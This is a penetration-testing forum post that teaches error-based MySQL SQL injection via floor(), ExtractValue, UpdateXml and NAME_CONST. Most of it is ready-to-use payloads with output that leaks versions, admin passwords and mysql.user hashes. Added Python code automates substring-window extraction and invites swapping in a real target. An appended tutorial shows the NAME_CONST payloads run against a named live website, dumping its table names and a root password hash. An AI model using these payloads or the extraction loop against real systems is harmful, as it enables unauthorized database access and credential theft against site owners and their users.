中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: MySQL floor(), ExtractValue, UpdateXml: three error-based SQL injection exploitation methods

Author: admin    Time: 2015-11-11 19:03

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked through the error text. To retrieve other data, replace version() with the subquery you want; it must return a single value (use limit 1 or a where clause, otherwise MySQL raises "Subquery returns more than 1 row" instead). Two practical limits: the table in the FROM clause (information_schema.tables here) must have at least three rows for the duplicate key to occur, and ER_DUP_ENTRY prints at most 64 characters of the key, so longer values have to be read in pieces with substring().

For example, to retrieve the administrator's username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
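The post shows the floor() trick working but not why it works, or why Method2 bothers to build a three-row union. The Python below is an added example, not code from the original post: it reimplements MySQL's RAND(seed) generator (the small LCG in mysys/my_rnd.c, seeded as sql/item_func.cc does) and the two-evaluation behaviour of GROUP BY when it fills its temporary table, so you can see that rand(0) always yields 0,1,1,0,1,1,... and that the third row is the first one whose looked-up key (…0) and inserted key (…1) disagree. The version string passed as `label` is a constructed placeholder for whatever the payload concatenates.

```python
# Added example (not part of the original post): why
# concat(<value>, floor(rand(0)*2)) in a GROUP BY key raises
# "Duplicate entry ... for key 'group_key'", and why it needs >= 3 rows.
#
# sql/item_func.cc seeds RAND(N) with randominit(N*0x10001+55555555,
# N*0x10000001); mysys/my_rnd.c then steps a tiny LCG modulo 0x3FFFFFFF.
# Because the seed is fixed, RAND(0) is the same sequence on every server,
# which is what makes the error deterministic (plain rand() only fails
# some of the time).

MAX_VALUE = 0x3FFFFFFF


class MySQLRand:
    """MySQL's RAND(seed) generator (mysys/my_rnd.c)."""

    def __init__(self, seed: int) -> None:
        seed1 = (seed * 0x10001 + 55555555) & 0xFFFFFFFF  # uint32 casts in item_func.cc
        seed2 = (seed * 0x10000001) & 0xFFFFFFFF
        self.seed1 = seed1 % MAX_VALUE
        self.seed2 = seed2 % MAX_VALUE

    def rand(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_sequence(n: int) -> list:
    """First n values of floor(rand(0)*2) exactly as MySQL produces them."""
    r = MySQLRand(0)
    return [int(r.rand() * 2) for _ in range(n)]


def simulate_group_by(row_count: int, label: str = "5.1.33-community-log") -> str:
    """Evaluate `select count(*) ... group by concat(label, floor(rand(0)*2))`
    over a table of row_count rows the way the server does: the key is
    computed once to look the group up and, when the group is new, computed
    AGAIN for the insert.  Each evaluation consumes one rand() value, so the
    inserted key can differ from the looked-up one and hit an existing group.
    `label` stands in for the expression the attacker concatenated (version(),
    a password column, ...); the default is a constructed value."""
    rnd = MySQLRand(0)

    def key() -> str:
        return label + str(int(rnd.rand() * 2))

    groups = {}
    for _ in range(row_count):
        k = key()                  # evaluation 1: lookup
        if k in groups:
            groups[k] += 1
            continue
        k = key()                  # evaluation 2: the key actually inserted
        if k in groups:            # 0 on lookup, 1 on insert -> collision
            return f"ERROR 1062 (23000): Duplicate entry '{k}' for key 'group_key'"
        groups[k] = 1
    return "no error"


if __name__ == "__main__":
    print(floor_rand0_sequence(6))          # [0, 1, 1, 0, 1, 1]
    for rows in (1, 2, 3):
        print(rows, "row(s):", simulate_group_by(rows))
```

Row 1 is looked up as "...0", not found, and inserted as "...1"; row 2 is looked up as "...1" and found; row 3 is looked up as "...0", not found, and inserted as "...1", which already exists. One or two rows never error, which is why Method1 reads from information_schema.tables and Method2 fabricates exactly three rows with `select 1 union select null union select !1`.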

2. ExtractValue

Test statement (0x5c is a backslash, which is not valid XPath, so the parser fails at the first character and the error message carries the whole concatenated value):

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement (0x3a is a colon and serves the same purpose as the backslash above):

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
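The XPATH syntax error that extractvalue() and updatexml() raise shows at most 32 characters of the bad expression, so a single probe leaks 31 characters once the marker byte is counted, and anything longer (a hash, a long table name) has to be read in substring() windows. The following is an added example, not part of the original post: `extract()` drives that loop and parses the error text, while `fake_target` is a constructed stand-in for the injectable page that emulates MySQL's answer for the hypothetical admin.pass value defined below. Against a real target, replace `fake_target` with a function that sends the payload to the endpoint and returns the server's error text; the same loop works for the floor() method with the regex changed to match "Duplicate entry".

```python
import re

# Added example, not code from the original post.  Reads a value longer than
# the error message can show by walking substring() windows through
# updatexml().  extractvalue() behaves identically.

WINDOW = 31  # MySQL shows 32 chars of the bad XPath; one is the '~' marker

# Constructed, hypothetical contents of admin.pass for id = 1 (56 characters,
# i.e. wider than one window).  Not real data.
FAKE_ADMIN_PASS = "admin888" + "0123456789abcdef" * 3

_SUBSTR = re.compile(
    r"substring\(\(select pass from admin where id = 1\),(\d+),(\d+)\)"
)


def fake_target(injected: str) -> str:
    """Stand-in for the vulnerable page: emulate MySQL evaluating
    `select * from article where id = 1 <injected>` and return the error text.
    It only understands the payloads build_payload() produces."""
    m = _SUBSTR.search(injected)
    if m is None:
        return "no error"
    start, length = int(m.group(1)), int(m.group(2))
    piece = FAKE_ADMIN_PASS[start - 1 : start - 1 + length]  # SQL substring is 1-based
    xpath = "~" + piece                                        # concat(0x7e, ...)
    return f"ERROR 1105 (HY000): XPATH syntax error: '{xpath[:32]}'"


def build_payload(start: int, length: int) -> str:
    """One updatexml() probe that leaks substring(pass, start, length).
    0x7e ('~') is invalid XPath, so the error starts at the marker."""
    return (
        " and updatexml(1,concat(0x7e,substring((select pass from admin where id = 1),"
        f"{start},{length})),1)"
    )


_ERR = re.compile(r"XPATH syntax error: '~([^']*)'")


def parse_error(message: str):
    """Return the leaked text after the '~' marker, or None if the
    response is not the expected XPATH error."""
    m = _ERR.search(message)
    return None if m is None else m.group(1)


def extract(target, window: int = WINDOW) -> str:
    """Drive `target` (a callable: injected SQL -> server response text)
    until the value has been read in full."""
    result, start = "", 1
    while True:
        piece = parse_error(target(build_payload(start, window)))
        if not piece:            # no error, or an empty window: nothing left
            break
        result += piece
        if len(piece) < window:  # a short window means the end of the value
            break
        start += window
    return result


if __name__ == "__main__":
    print(extract(fake_target))
```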



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection technique for newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
& M" L% x. O2 M1 \/ P1 x( q% B2 x  P" F6 m) A1 Y% E# W- n
Code:
NAME_CONST(name, value)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = your MySQL variable.
MySQL 5.1.3 Server System Variables
Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error: Duplicate column name '1'
Now let's get the tables out of this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2